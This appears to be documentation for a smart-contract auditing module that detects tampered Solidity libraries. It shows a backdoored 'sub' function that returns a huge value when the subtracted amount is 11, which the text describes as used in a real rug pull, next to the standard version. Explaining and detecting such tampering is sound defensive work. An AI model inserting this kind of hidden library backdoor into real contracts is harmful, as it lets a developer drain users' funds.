In Solidity, it is a common practice to import standard libraries as they contains reusable code for basic computation logic. Library functions which are inherited are not intended to be changed by developers. These libraries are altered by malicious actors, since little or no attention is given to inherited libraries by smart contract auditors while auditing as they assume standard libraries are not tampered by the developers.

This module compares the libraries used in the contracts with standard libraries to check if there is a deviation.

Example Scenario

Tapered Library

function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) {
    if (b == 11) return ~uint120(0); 
    require(b <= a, errorMessage); 
    uint256 c = a - b;
    return c;
 }

Standard Library

function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) {
    require(b <= a, errorMessage); 
    uint256 c = a - b;
    return c;
 }

The above is a real life example where (bsc-scan link) we could see that the second line in the sub function has been tampered: There is a hidden check which would return a large positive value when 11 is subtracted from the input value. This is hidden change in the library is known only to the developer who wrote the contract and he used it as a rug pull. Our module detects this change in the sub function and returns it as shown in the below API.